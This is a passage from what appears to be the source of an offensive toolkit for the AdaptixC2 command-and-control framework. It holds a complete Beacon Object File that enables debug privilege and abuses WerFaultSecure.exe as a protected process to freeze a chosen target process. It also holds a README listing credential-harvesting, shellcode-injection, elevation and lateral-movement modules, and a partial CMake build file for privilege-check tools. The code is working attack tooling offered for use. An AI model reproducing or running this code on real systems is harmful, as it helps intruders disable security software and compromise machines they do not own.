#define EXTENDED_STARTUPINFO_PRESENT 0x00010000
#endif

#ifndef CREATE_PROTECTED_PROCESS
#define CREATE_PROTECTED_PROCESS 0x00040000
#endif

#ifndef ERROR_INSUFFICIENT_BUFFER
#define ERROR_INSUFFICIENT_BUFFER 122
#endif

#ifndef STILL_ACTIVE
#define STILL_ACTIVE 259
#endif

#ifndef HEAP_ZERO_MEMORY
#define HEAP_ZERO_MEMORY 0x00000008
#endif

#define StateWait 5
#define Suspended 5

#define MODE_FREEZE   1
#define MODE_UNFREEZE 2

#define KEY_HPROCESS   "pf_hProc"
#define KEY_HTHREAD    "pf_hThread"
#define KEY_HDUMP      "pf_hDump"
#define KEY_HENCDUMP   "pf_hEncDump"
#define KEY_HCANCEL    "pf_hCancel"
#define KEY_WERPID     "pf_werPid"
#define KEY_TARGETPID  "pf_targetPid"
#define KEY_ACTIVE     "pf_active"

typedef struct _MY_SYSTEM_THREAD_INFORMATION {
    LARGE_INTEGER KernelTime;
    LARGE_INTEGER UserTime;
    LARGE_INTEGER CreateTime;
    ULONG WaitTime;
    PVOID StartAddress;
    CLIENT_ID ClientId;
    LONG Priority;
    LONG BasePriority;
    ULONG ContextSwitches;
    ULONG ThreadState;
    ULONG WaitReason;
} MY_SYSTEM_THREAD_INFORMATION;

typedef struct _MY_SYSTEM_PROCESS_INFORMATION {
    ULONG NextEntryOffset;
    ULONG NumberOfThreads;
    LARGE_INTEGER Reserved[3];
    LARGE_INTEGER CreateTime;
    LARGE_INTEGER UserTime;
    LARGE_INTEGER KernelTime;
    UNICODE_STRING ImageName;
    KPRIORITY BasePriority;
    HANDLE UniqueProcessId;
    HANDLE InheritedFromUniqueProcessId;
    ULONG HandleCount;
    ULONG SessionId;
    ULONG_PTR PageDirectoryBase;
    SIZE_T PeakVirtualSize;
    SIZE_T VirtualSize;
    ULONG PageFaultCount;
    SIZE_T PeakWorkingSetSize;
    SIZE_T WorkingSetSize;
    SIZE_T QuotaPeakPagedPoolUsage;
    SIZE_T QuotaPagedPoolUsage;
    SIZE_T QuotaPeakNonPagedPoolUsage;
    SIZE_T QuotaNonPagedPoolUsage;
    SIZE_T PagefileUsage;
    SIZE_T PeakPagefileUsage;
    SIZE_T PrivatePageCount;
    LARGE_INTEGER ReadOperationCount;
    LARGE_INTEGER WriteOperationCount;
    LARGE_INTEGER OtherOperationCount;
    LARGE_INTEGER ReadTransferCount;
    LARGE_INTEGER WriteTransferCount;
    LARGE_INTEGER OtherTransferCount;
    MY_SYSTEM_THREAD_INFORMATION Threads[1];
} MY_SYSTEM_PROCESS_INFORMATION;

typedef NTSTATUS(WINAPI* PNtQuerySystemInformation)(
    SYSTEM_INFORMATION_CLASS SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength
);

typedef NTSTATUS(NTAPI* pNtSuspendProcess)(HANDLE ProcessHandle);
typedef NTSTATUS(NTAPI* pNtResumeProcess)(HANDLE ProcessHandle);

void PrintWin32Error(DWORD errorCode)
{
    switch (errorCode) {
        case 2:
            BeaconPrintf(CALLBACK_ERROR, "File not found");
            break;
        case 3:
            BeaconPrintf(CALLBACK_ERROR, "Path not found");
            break;
        case 5:
            BeaconPrintf(CALLBACK_ERROR, "Access denied");
            break;
        case 87:
            BeaconPrintf(CALLBACK_ERROR, "Invalid parameter");
            break;
        case 577:
            BeaconPrintf(CALLBACK_ERROR, "Invalid signature");
            break;
        case 740:
            BeaconPrintf(CALLBACK_ERROR, "Elevation required");
            break;
        case 1314:
            BeaconPrintf(CALLBACK_ERROR, "Privilege not held");
            break;
        default:
            BeaconPrintf(CALLBACK_ERROR, "Error: %d", errorCode);
    }
}

BOOL EnableDebugPrivilege()
{
    HANDLE hToken = NULL;
    TOKEN_PRIVILEGES tp = {0};
    LUID luid;

    if (!ADVAPI32$OpenProcessToken(KERNEL32$GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
        return FALSE;

    if (!ADVAPI32$LookupPrivilegeValueW(NULL, SE_DEBUG_NAME_W, &luid)) {
        KERNEL32$CloseHandle(hToken);
        return FALSE;
    }

    tp.PrivilegeCount = 1;
    tp.Privileges[0].Luid = luid;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    ADVAPI32$AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);
    DWORD lastError = KERNEL32$GetLastError();
    KERNEL32$CloseHandle(hToken);

    return (lastError == ERROR_SUCCESS);
}

DWORD GetMainThreadId(DWORD pid)
{
    ULONG bufferSize = 0x10000;
    PVOID buffer = NULL;
    NTSTATUS status;
    int attempts = 0;
    HANDLE hHeap = KERNEL32$GetProcessHeap();

    HMODULE hNtdll = KERNEL32$GetModuleHandleA("ntdll.dll");
    PNtQuerySystemInformation NtQuerySystemInformation =
        (PNtQuerySystemInformation)KERNEL32$GetProcAddress(hNtdll, "NtQuerySystemInformation");

    if (!NtQuerySystemInformation) return 0;

    do {
        if (buffer) KERNEL32$HeapFree(hHeap, 0, buffer);
        buffer = KERNEL32$HeapAlloc(hHeap, HEAP_ZERO_MEMORY, bufferSize);
        if (!buffer) return 0;

        status = NtQuerySystemInformation(SystemProcessInformation, buffer, bufferSize, NULL);
        if (status == STATUS_INFO_LENGTH_MISMATCH) {
            bufferSize *= 2;
            if (++attempts > 10) {
                KERNEL32$HeapFree(hHeap, 0, buffer);
                return 0;
            }
        }
    } while (status == STATUS_INFO_LENGTH_MISMATCH);

    if (!NT_SUCCESS(status)) {
        KERNEL32$HeapFree(hHeap, 0, buffer);
        return 0;
    }

    DWORD mainThreadId = 0;
    MY_SYSTEM_PROCESS_INFORMATION* spi = (MY_SYSTEM_PROCESS_INFORMATION*)buffer;

    while (TRUE) {
        if ((DWORD)(ULONG_PTR)spi->UniqueProcessId == pid) {
            if (spi->NumberOfThreads > 0)
                mainThreadId = (DWORD)(ULONG_PTR)spi->Threads[0].ClientId.UniqueThread;
            break;
        }
        if (spi->NextEntryOffset == 0) break;
        spi = (MY_SYSTEM_PROCESS_INFORMATION*)((BYTE*)spi + spi->NextEntryOffset);
    }

    KERNEL32$HeapFree(hHeap, 0, buffer);
    return mainThreadId;
}

BOOL IsProcessSuspendedByPID(DWORD pid)
{
    ULONG bufferSize = 0x10000;
    PVOID buffer = NULL;
    NTSTATUS status;
    int attempts = 0;
    HANDLE hHeap = KERNEL32$GetProcessHeap();

    HMODULE hNtdll = KERNEL32$GetModuleHandleA("ntdll.dll");
    PNtQuerySystemInformation NtQuerySystemInformation =
        (PNtQuerySystemInformation)KERNEL32$GetProcAddress(hNtdll, "NtQuerySystemInformation");

    if (!NtQuerySystemInformation) return FALSE;

    do {
        if (buffer) KERNEL32$HeapFree(hHeap, 0, buffer);
        buffer = KERNEL32$HeapAlloc(hHeap, HEAP_ZERO_MEMORY, bufferSize);
        if (!buffer) return FALSE;

        status = NtQuerySystemInformation(SystemProcessInformation, buffer, bufferSize, NULL);
        if (status == STATUS_INFO_LENGTH_MISMATCH) {
            bufferSize *= 2;
            if (++attempts > 10) {
                KERNEL32$HeapFree(hHeap, 0, buffer);
                return FALSE;
            }
        }
    } while (status == STATUS_INFO_LENGTH_MISMATCH);

    if (!NT_SUCCESS(status)) {
        KERNEL32$HeapFree(hHeap, 0, buffer);
        return FALSE;
    }

    BOOL result = FALSE;
    MY_SYSTEM_PROCESS_INFORMATION* spi = (MY_SYSTEM_PROCESS_INFORMATION*)buffer;

    while (TRUE) {
        if ((DWORD)(ULONG_PTR)spi->UniqueProcessId == pid) {
            if (spi->NumberOfThreads == 0) break;
            result = TRUE;
            for (ULONG i = 0; i < spi->NumberOfThreads; ++i) {
                if (spi->Threads[i].ThreadState != StateWait ||
                    spi->Threads[i].WaitReason != Suspended) {
                    result = FALSE;
                    break;
                }
            }
            break;
        }
        if (spi->NextEntryOffset == 0) break;
        spi = (MY_SYSTEM_PROCESS_INFORMATION*)((BYTE*)spi + spi->NextEntryOffset);
    }

    KERNEL32$HeapFree(hHeap, 0, buffer);
    return result;
}

BOOL SuspendProcessByPID(DWORD pid)
{
    if (pid == 0) return FALSE;

    HMODULE hNtdll = KERNEL32$GetModuleHandleA("ntdll.dll");
    if (!hNtdll) return FALSE;

    pNtSuspendProcess NtSuspendProcess = (pNtSuspendProcess)KERNEL32$GetProcAddress(hNtdll, "NtSuspendProcess");
    if (!NtSuspendProcess) return FALSE;

    HANDLE hProcess = KERNEL32$OpenProcess(PROCESS_SUSPEND_RESUME, FALSE, pid);
    if (!hProcess) return FALSE;

    NTSTATUS status = NtSuspendProcess(hProcess);
    KERNEL32$CloseHandle(hProcess);

    return (status == 0);
}

BOOL ResumeProcessByPID(DWORD pid)
{
    if (pid == 0) return FALSE;

    HMODULE hNtdll = KERNEL32$GetModuleHandleA("ntdll.dll");
    if (!hNtdll) return FALSE;

    pNtResumeProcess NtResumeProcess = (pNtResumeProcess)KERNEL32$GetProcAddress(hNtdll, "NtResumeProcess");
    if (!NtResumeProcess) return FALSE;

    HANDLE hProcess = KERNEL32$OpenProcess(PROCESS_SUSPEND_RESUME, FALSE, pid);
    if (!hProcess) return FALSE;

    NTSTATUS status = NtResumeProcess(hProcess);
    KERNEL32$CloseHandle(hProcess);

    return (status == 0);
}

BOOL CreatePPLProcess(wchar_t* commandLine, HANDLE* phProcess, HANDLE* phThread)
{
    SIZE_T size = 0;
    STARTUPINFOEXW siex = {0};
    siex.StartupInfo.cb = sizeof(siex);
    PROCESS_INFORMATION pi = {0};
    LPPROC_THREAD_ATTRIBUTE_LIST ptal = NULL;
    DWORD protectionLevel = 0;
    HANDLE hHeap = KERNEL32$GetProcessHeap();

    if (!KERNEL32$InitializeProcThreadAttributeList(NULL, 1, 0, &size) &&
        KERNEL32$GetLastError() != ERROR_INSUFFICIENT_BUFFER) {
        return FALSE;
    }

    ptal = (LPPROC_THREAD_ATTRIBUTE_LIST)KERNEL32$HeapAlloc(hHeap, HEAP_ZERO_MEMORY, size);
    if (!ptal) return FALSE;

    if (!KERNEL32$InitializeProcThreadAttributeList(ptal, 1, 0, &size)) {
        KERNEL32$HeapFree(hHeap, 0, ptal);
        return FALSE;
    }

    if (!KERNEL32$UpdateProcThreadAttribute(ptal, 0,
        0x0002000B,
        &protectionLevel, sizeof(protectionLevel), NULL, NULL)) {
        KERNEL32$DeleteProcThreadAttributeList(ptal);
        KERNEL32$HeapFree(hHeap, 0, ptal);
        return FALSE;
    }

    siex.lpAttributeList = ptal;

    if (!KERNEL32$CreateProcessW(NULL, commandLine, NULL, NULL, TRUE,
        EXTENDED_STARTUPINFO_PRESENT | CREATE_PROTECTED_PROCESS,
        NULL, NULL, &siex.StartupInfo, &pi)) {
        DWORD err = KERNEL32$GetLastError();
        PrintWin32Error(err);
        KERNEL32$DeleteProcThreadAttributeList(ptal);
        KERNEL32$HeapFree(hHeap, 0, ptal);
        return FALSE;
    }

    KERNEL32$DeleteProcThreadAttributeList(ptal);
    KERNEL32$HeapFree(hHeap, 0, ptal);

    *phProcess = pi.hProcess;
    *phThread = pi.hThread;
    return TRUE;
}

BOOL FreezeRun(wchar_t* werPath, DWORD targetPID, DWORD targetTID)
{
    if (BeaconGetValue(KEY_ACTIVE) != NULL) {
        BeaconPrintf(CALLBACK_ERROR, "Already frozen");
        return FALSE;
    }

    SECURITY_ATTRIBUTES sa = {0};
    sa.nLength = sizeof(sa);
    sa.bInheritHandle = TRUE;

    wchar_t dumpFileName[MAX_PATH];
    wchar_t encDumpFileName[MAX_PATH];
    MSVCRT$_snwprintf(dumpFileName, MAX_PATH, L"C:\\Windows\\Temp\\pf_%d.tmp", targetPID);
    MSVCRT$_snwprintf(encDumpFileName, MAX_PATH, L"C:\\Windows\\Temp\\pf_%d.enc", targetPID);

    HANDLE hDump = KERNEL32$CreateFileW(dumpFileName, GENERIC_WRITE | GENERIC_READ, 0, &sa,
        CREATE_ALWAYS, FILE_ATTRIBUTE_HIDDEN, NULL);
    if (hDump == INVALID_HANDLE_VALUE) {
        PrintWin32Error(KERNEL32$GetLastError());
        return FALSE;
    }

    HANDLE hEncDump = KERNEL32$CreateFileW(encDumpFileName, GENERIC_WRITE, 0, &sa,
        CREATE_ALWAYS, FILE_ATTRIBUTE_HIDDEN, NULL);
    if (hEncDump == INVALID_HANDLE_VALUE) {
        KERNEL32$CloseHandle(hDump);
        KERNEL32$DeleteFileW(dumpFileName);
        return FALSE;
    }

    HANDLE hCancel = KERNEL32$CreateEventW(&sa, TRUE, FALSE, NULL);
    if (!hCancel) {
        KERNEL32$CloseHandle(hDump);
        KERNEL32$CloseHandle(hEncDump);
        KERNEL32$DeleteFileW(dumpFileName);
        KERNEL32$DeleteFileW(encDumpFileName);
        return FALSE;
    }

    wchar_t commandLine[1024];
    MSVCRT$_snwprintf(commandLine, 1024,
        L"%s /h /pid %d /tid %d /file %llu /encfile %llu /cancel %llu /type 268310",
        werPath, targetPID, targetTID,
        (UINT_PTR)hDump, (UINT_PTR)hEncDump, (UINT_PTR)hCancel);

    HANDLE hProcess = NULL;
    HANDLE hThread = NULL;

    if (!CreatePPLProcess(commandLine, &hProcess, &hThread)) {
        KERNEL32$CloseHandle(hDump);
        KERNEL32$CloseHandle(hEncDump);
        KERNEL32$CloseHandle(hCancel);
        KERNEL32$DeleteFileW(dumpFileName);
        KERNEL32$DeleteFileW(encDumpFileName);
        return FALSE;
    }

    DWORD werPID = KERNEL32$GetProcessId(hProcess);

    int waited = 0;
    BOOL suspended = FALSE;
    while (!suspended && waited < 10000) {
        KERNEL32$Sleep(100);
        waited += 100;
        suspended = IsProcessSuspendedByPID(targetPID);

        DWORD exitCode = 0;
        if (KERNEL32$GetExitCodeProcess(hProcess, &exitCode) && exitCode != STILL_ACTIVE) {
            BeaconPrintf(CALLBACK_ERROR, "Target process protected");
            break;
        }
    }

    if (suspended) {
        if (SuspendProcessByPID(werPID)) {
            BeaconAddValue(KEY_HPROCESS, (void*)(ULONG_PTR)hProcess);
            BeaconAddValue(KEY_HTHREAD, (void*)(ULONG_PTR)hThread);
            BeaconAddValue(KEY_HDUMP, (void*)(ULONG_PTR)hDump);
            BeaconAddValue(KEY_HENCDUMP, (void*)(ULONG_PTR)hEncDump);
            BeaconAddValue(KEY_HCANCEL, (void*)(ULONG_PTR)hCancel);
            BeaconAddValue(KEY_WERPID, (void*)(ULONG_PTR)werPID);
            BeaconAddValue(KEY_TARGETPID, (void*)(ULONG_PTR)targetPID);
            BeaconAddValue(KEY_ACTIVE, (void*)1);

            BeaconPrintf(CALLBACK_OUTPUT, "[+] Frozen PID %d", targetPID);
            return TRUE;
        } else {
            BeaconPrintf(CALLBACK_ERROR, "Failed to suspend");
        }
    } else {
        BeaconPrintf(CALLBACK_ERROR, "Target process protected");
    }

    KERNEL32$TerminateProcess(hProcess, 1);
    KERNEL32$CloseHandle(hProcess);
    KERNEL32$CloseHandle(hThread);
    KERNEL32$CloseHandle(hDump);
    KERNEL32$CloseHandle(hEncDump);
    KERNEL32$CloseHandle(hCancel);
    KERNEL32$DeleteFileW(dumpFileName);
    KERNEL32$DeleteFileW(encDumpFileName);

    return FALSE;
}

BOOL UnfreezeRun()
{
    if (BeaconGetValue(KEY_ACTIVE) == NULL) {
        BeaconPrintf(CALLBACK_ERROR, "No frozen state found");
        return FALSE;
    }

    HANDLE hProcess = (HANDLE)(ULONG_PTR)BeaconGetValue(KEY_HPROCESS);
    HANDLE hThread = (HANDLE)(ULONG_PTR)BeaconGetValue(KEY_HTHREAD);
    HANDLE hDump = (HANDLE)(ULONG_PTR)BeaconGetValue(KEY_HDUMP);
    HANDLE hEncDump = (HANDLE)(ULONG_PTR)BeaconGetValue(KEY_HENCDUMP);
    HANDLE hCancel = (HANDLE)(ULONG_PTR)BeaconGetValue(KEY_HCANCEL);
    DWORD targetPID = (DWORD)(ULONG_PTR)BeaconGetValue(KEY_TARGETPID);

    if (hProcess) KERNEL32$TerminateProcess(hProcess, 1);
    if (hProcess) KERNEL32$CloseHandle(hProcess);
    if (hThread) KERNEL32$CloseHandle(hThread);
    if (hDump) KERNEL32$CloseHandle(hDump);
    if (hEncDump) KERNEL32$CloseHandle(hEncDump);
    if (hCancel) KERNEL32$CloseHandle(hCancel);

    wchar_t dumpFileName[MAX_PATH];
    wchar_t encDumpFileName[MAX_PATH];
    MSVCRT$_snwprintf(dumpFileName, MAX_PATH, L"C:\\Windows\\Temp\\pf_%d.tmp", targetPID);
    MSVCRT$_snwprintf(encDumpFileName, MAX_PATH, L"C:\\Windows\\Temp\\pf_%d.enc", targetPID);
    KERNEL32$DeleteFileW(dumpFileName);
    KERNEL32$DeleteFileW(encDumpFileName);

    BeaconRemoveValue(KEY_HPROCESS);
    BeaconRemoveValue(KEY_HTHREAD);
    BeaconRemoveValue(KEY_HDUMP);
    BeaconRemoveValue(KEY_HENCDUMP);
    BeaconRemoveValue(KEY_HCANCEL);
    BeaconRemoveValue(KEY_WERPID);
    BeaconRemoveValue(KEY_TARGETPID);
    BeaconRemoveValue(KEY_ACTIVE);

    BeaconPrintf(CALLBACK_OUTPUT, "[+] Resumed PID %d", targetPID);
    return TRUE;
}

void go(char* args, int len)
{
    datap parser;
    BeaconDataParse(&parser, args, len);

    int mode = BeaconDataInt(&parser);
    DWORD pid = BeaconDataInt(&parser);

    wchar_t werPath[MAX_PATH];
    MSVCRT$_snwprintf(werPath, MAX_PATH, L"C:\\Windows\\System32\\WerFaultSecure.exe");

    if (mode == MODE_UNFREEZE) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] WARNING: Unfreeze may not work on Windows 10");
        UnfreezeRun();
        return;
    }

    if (!EnableDebugPrivilege()) {
        BeaconPrintf(CALLBACK_ERROR, "Need elevated privileges");
        return;
    }

    DWORD tid = GetMainThreadId(pid);
    if (tid == 0) {
        BeaconPrintf(CALLBACK_ERROR, "Process not found");
        return;
    }

    if (mode == MODE_FREEZE) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] WARNING: Unfreeze may not work on Windows 10");
        FreezeRun(werPath, pid, tid);
    }
}

================================================
FILE: README.md
================================================
# Extension-Kit

Extension Kit for [AdaptixC2](https://github.com/Adaptix-Framework/AdaptixC2)

# Installation

```
# Ubuntu/Kali
apt install g++-mingw-w64-x86-64-posix  gcc-mingw-w64-x86-64-posix  mingw-w64-tools

# Arch
pacman -Syu mingw-w64-x86_64-gcc mingw-w64-x86_64-gcc-libs
```

Building modules via make

```bash
git clone https://github.com/Adaptix-Framework/Extension-Kit
cd Extension-Kit
make
```

Load all modules in AdaptixC2 client: **Main menu** -> **AxScript** -> **Script manager**. 

![](./_img/01.png)

**Context menu** -> **Load new** and select the _extension-kit.axs_ file.

# Modules

## AD-BOF

A BOFs that contains common enumeration and attack methods for Windows Active Directory.

![](./AD-BOF/_img/01.png)

![](./AD-BOF/_img/02.png)

![](./AD-BOF/_img/03.png)

![](./AD-BOF/_img/04.png)

![](./AD-BOF/_img/05.png)

## Creds-BOF

BOF tools that can be used to harvest passwords [More details](https://github.com/Adaptix-Framework/Extension-Kit/blob/main/Creds-BOF/README.md)

![](./Creds-BOF/_img/01.png)



## Elevation-BOF

BOFs for context elevation. [More details](https://github.com/Adaptix-Framework/Extension-Kit/blob/main/Elevation-BOF/README.md)

![](./Elevation-BOF/_img/01.png)



## Execution-BOF 

BOFs for inline execution. [More details](https://github.com/Adaptix-Framework/Extension-Kit/blob/main/Execution-BOF/README.md)

![](./Execution-BOF/_img/01.png)



## Injection-BOF

Beacon Object Files for injects desired shellcode into target process. [More details](https://github.com/Adaptix-Framework/Extension-Kit/blob/main/Injection-BOF/README.md)

![](./Injection-BOF/_img/01.png)



## LateralMovement-BOF

BOFs for lateral movement with the specified method. [More details](https://github.com/Adaptix-Framework/Extension-Kit/blob/main/LateralMovement-BOF/README.md)

![](./LateralMovement-BOF/_img/01.png)



## Process-BOF

BOFs that provide situational awareness of processes, modules, and services. [More details](https://github.com/Adaptix-Framework/Extension-Kit/blob/main/Process-BOF/README.md)

![](./Process-BOF/_img/01.png)



## Postex-BOF

This extension allows you to customize the Beacon Object File (BOF) for future use. [More details](https://github.com/Adaptix-Framework/Extension-Kit/blob/main/Postex-BOF/README.md)

![](./Postex-BOF/_img/01.png)



## SAL-BOF

Situation Awareness Local BOFs. [More details](https://github.com/Adaptix-Framework/Extension-Kit/blob/main/SAL-BOF/README.md)

![](./SAL-BOF/_img/01.png)



## SAR-BOF

Situation Awareness Remote BOFs. [More details](https://github.com/Adaptix-Framework/Extension-Kit/blob/main/SAR-BOF/README.md)

![](./SAR-BOF/_img/01.png)



# CONTRIBUTING

Please pushing сhanges to **dev** branch. Otherwise, changes will be made manually in the **dev** branch.


================================================
FILE: SAL-BOF/CMakeLists.txt
================================================
cmake_minimum_required(VERSION 3.16)
#project(SAL-BOF C)

set(CMAKE_C_STANDARD 99)

# Include directories (main _include is at root level)
include_directories(${CMAKE_SOURCE_DIR}/_include)

# Source files
set(ARP_SOURCES arp/arp.c)
set(CACLS_SOURCES cacls/cacls.c)
set(DIR_SOURCES dir/dir.c)
set(ENV_SOURCES env/env.c)
set(IPCONFIG_SOURCES ipconfig/ipconfig.c)
set(LISTDNS_SOURCES listdns/listdns.c)
set(NETSTAT_SOURCES netstat/netstat.c)
set(NSLOOKUP_SOURCES nslookup/nslookup.c)
set(ROUTEPRINT_SOURCES routeprint/routeprint.c)
set(UPTIME_SOURCES uptime/uptime.c)
set(USERIDLETIME_SOURCES useridletime/useridletime.c)
set(WHOAMI_SOURCES whoami/whoami.c)
set(VULNDRIVERS_SOURCES privcheck/vulnerabledrivers.c)
set(ALWAYSELEVATED_SOURCES privcheck/alwaysinstallelevated.c)
set(HIJACKABLEPATH_SOURCES privcheck/hijackablepath.c)
set(TOKENPRIV_SOURCES privcheck/tokenprivileges.c)
set(UNATTENDFILES_SOURCES privcheck/unattendfiles.c)
set(UNQUOTEDSVC_SOURCES privcheck/unquotedsvcpath.c)
set(AUTOLOGON_SOURCES privcheck/autologon.c)
set(CREDMANAGER_SOURCES privcheck/credentialmanager.c)
set(MODAUTORUN_SOURCES privcheck/modifiableautorun.c)
set(MODSVC_SOURCES privcheck/modifiablesvc.c)
set(PSHISTORY_SOURCES privcheck/pshistory.c)
set(UACSTATUS_SOURCES privcheck/uacstatus.c)
set(PRIVCHECK_ALL_SOURCES privcheck/privcheck_all.c)

# Compiler flags
set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -Os -DBOF")
set(CMAKE_C_FLAGS_RELEASE "${CMAKE_C_FLAGS_RELEASE} -s")

# Object file targets
add_library(arp OBJECT ${ARP_SOURCES})
add_library(cacls OBJECT ${CACLS_SOURCES})
add_library(dir OBJECT ${DIR_SOURCES})
add_library(env OBJECT ${ENV_SOURCES})
add_library(ipconfig OBJECT ${IPCONFIG_SOURCES})
add_library(listdns OBJECT ${LISTDNS_SOURCES})
add_library(netstat OBJECT ${NETSTAT_SOURCES})

add_library(nslookup OBJECT ${NSLOOKUP_SOURCES})
target_compile_options(nslookup PRIVATE -fno-jump-tables)

add_library(routeprint OBJECT ${ROUTEPRINT_SOURCES})
add_library(uptime OBJECT ${UPTIME_SOURCES})
add_library(useridletime OBJECT ${USERIDLETIME_SOURCES})
add_library(whoami OBJECT ${WHOAMI_SOURCES})

# Privcheck targets
add_library(vulndrivers OBJECT ${VULNDRIVERS_SOURCES})
target_compile_options(vulndrivers PRIVATE -w -Wno-incompatible-pointer-types)

add_library(alwayselevated OBJECT ${ALWAYSELEVATED_SOURCES})
target_compile_options(alwayselevated PRIVATE -w -Wno-incompatible-pointer-types)

add_library(hijackablepath OBJECT ${HIJACKABLEPATH_SOURCES})
target_compile_options(hijackablepath PRIVATE -w -Wno-incompatible-pointer-types)

add_library(tokenpriv OBJECT ${TOKENPRIV_SOURCES})
target_compile_options(tokenpriv PRIVATE -w -Wno-incompatible-pointer-types)

add_library(unattendfiles OBJECT ${UNATTENDFILES_SOURCES})
target_compile_options(unattendfiles PRIVATE -w -Wno-incompatible-pointer-types)

add_library(unquotedsvc OBJECT ${UNQUOTEDSVC_SOURCES})
target_compile_options(unquotedsvc PRIVATE -w -Wno-incompatible-pointer-types)

add_library(autologon OBJECT ${AUTOLOGON_SOURCES})
target_compile_options(autologon PRIVATE -w -Wno-incompatible-pointer-types)

add_library(credmanager OBJECT ${CREDMANAGER_SOURCES})
target_compile_options(credmanager PRIVATE -w -Wno-incompatible-pointer-types)

add_library(modautorun OBJECT ${MODAUTORUN_SOURCES})
target_compile_options(modautorun PRIVATE -w -Wno-incompatible-pointer-types)

add_library(modsvc OBJECT ${MODSVC_SOURCES})
target_compile_options(modsvc PRIVATE -w -Wno-incompatible-pointer-types)

add_library(pshistory OBJECT ${PSHISTORY_SOURCES})
target_compile_options(pshistory PRIVATE -w -Wno-incompatible-pointer-types)

add_library(uacstatus OBJECT ${UACSTATUS_SOURCES})
target_compile_options(uacstatus PRIVATE -w -Wno-incompatible-pointer-types)

add_library(privcheck_all OBJECT ${PRIVCHECK_ALL_SOURCES})
target_compile_options(privcheck_all PRIVATE -w -Wno-incompatible-pointer-types)

# Custom command to download vulnerable driver list
add_custom_target(download_vulnerable_driver_list
    COMMAND python3 ${CMAKE_CURRENT_SOURCE_DIR}/privcheck/download_vulnerable_driver_list.py
    WORKING_DIRECTORY ${CMAKE_CURRENT_SOURCE_DIR}
    COMMENT "Downloading vulnerable driver list"
)

add_dependencies(vulndrivers download_vulnerable_driver_list)

# Create _bin directory
file(MAKE_DIRECTORY ${CMAKE_CURRENT_SOURCE_DIR}/_bin)

# Custom commands to copy object files to _bin
add_custom_target(copy_arp ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:arp> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/arp.x64.o
    DEPENDS arp
    COMMENT "Copying arp object file"
)

add_custom_target(copy_cacls ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:cacls> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/cacls.x64.o
    DEPENDS cacls
    COMMENT "Copying cacls object file"
)

add_custom_target(copy_dir ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:dir> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/dir.x64.o
    DEPENDS dir
    COMMENT "Copying dir object file"
)

add_custom_target(copy_env ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:env> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/env.x64.o
    DEPENDS env
    COMMENT "Copying env object file"
)

add_custom_target(copy_ipconfig ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:ipconfig> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/ipconfig.x64.o
    DEPENDS ipconfig
    COMMENT "Copying ipconfig object file"
)

add_custom_target(copy_listdns ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:listdns> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/listdns.x64.o
    DEPENDS listdns
    COMMENT "Copying listdns object file"
)

add_custom_target(copy_netstat ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:netstat> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/netstat.x64.o
    DEPENDS netstat
    COMMENT "Copying netstat object file"
)

add_custom_target(copy_nslookup ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:nslookup> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/nslookup.x64.o
    DEPENDS nslookup
    COMMENT "Copying nslookup object file"
)

add_custom_target(copy_routeprint ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:routeprint> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/routeprint.x64.o
    DEPENDS routeprint
    COMMENT "Copying routeprint object file"
)

add_custom_target(copy_uptime ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:uptime> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/uptime.x64.o
    DEPENDS uptime
    COMMENT "Copying uptime object file"
)

add_custom_target(copy_useridletime ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:useridletime> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/useridletime.x64.o
    DEPENDS useridletime
    COMMENT "Copying useridletime object file"
)

add_custom_target(copy_whoami ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:whoami> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/whoami.x64.o
    DEPENDS whoami
    COMMENT "Copying whoami object file"
)

add_custom_target(copy_vulndrivers ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:vulndrivers> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/vulndrivers.x64.o
    DEPENDS vulndrivers
    COMMENT "Copying vulndrivers object file"
)

add_custom_target(copy_alwayselevated ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:alwayselevated> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/alwayselevated.x64.o
    DEPENDS alwayselevated
    COMMENT "Copying alwayselevated object file"
)

add_custom_target(copy_hijackablepath ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:hijackablepath> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/hijackablepath.x64.o
    DEPENDS hijackablepath
    COMMENT "Copying hijackablepath object file"
)

add_custom_target(copy_tokenpriv ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:tokenpriv> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/tokenpriv.x64.o
    DEPENDS tokenpriv
